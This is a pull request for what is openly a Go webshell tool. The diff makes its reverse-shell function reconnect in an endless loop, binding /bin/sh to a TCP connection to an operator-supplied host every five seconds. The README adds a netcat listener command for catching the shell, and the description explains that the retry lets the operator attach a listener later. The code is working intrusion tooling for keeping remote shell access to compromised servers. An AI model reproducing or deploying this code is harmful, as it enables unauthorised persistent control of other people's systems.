### PR TITLE
make reverse shell keep trying a loop

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -1,0 +1,1 @@
+go-webshell

--- a/README.md
+++ b/README.md
@@ -20,3 +20,9 @@ Running with no arguments will launch the HTTP server on **0.0.0.0:8080**
 ##### TODO:
 * File Manager
 * ???
+
+#### Example reverse shell client
+To test out the reverse shell client, you can use netcat
+```
+nc -p -l 4443
+```

--- a/webshell.go
+++ b/webshell.go
@@ -9,15 +9,19 @@ import (
     "runtime"
     "strings"
     "flag"
+    "time"
 )
 
 func reverseShell(ip string, port string) {
-    c, _ := net.Dial("tcp", ip + ":" + port)
-    cmd := exec.Command("/bin/sh")
-    cmd.Stdin=c
-    cmd.Stdout=c
-    cmd.Stderr=c
-    cmd.Run()
+    for {
+        c, _ := net.Dial("tcp", ip + ":" + port)
+        cmd := exec.Command("/bin/sh")
+        cmd.Stdin=c
+        cmd.Stdout=c
+        cmd.Stderr=c
+        cmd.Run()
+        time.Sleep(5 * time.Second)
+    }
 }
 
 


### PR DESCRIPTION
The reverse shell connection will keep trying to connect every 5 seconds, so somebody can fire off the request, then open the netcat or other reverse shell client later when they get around to it.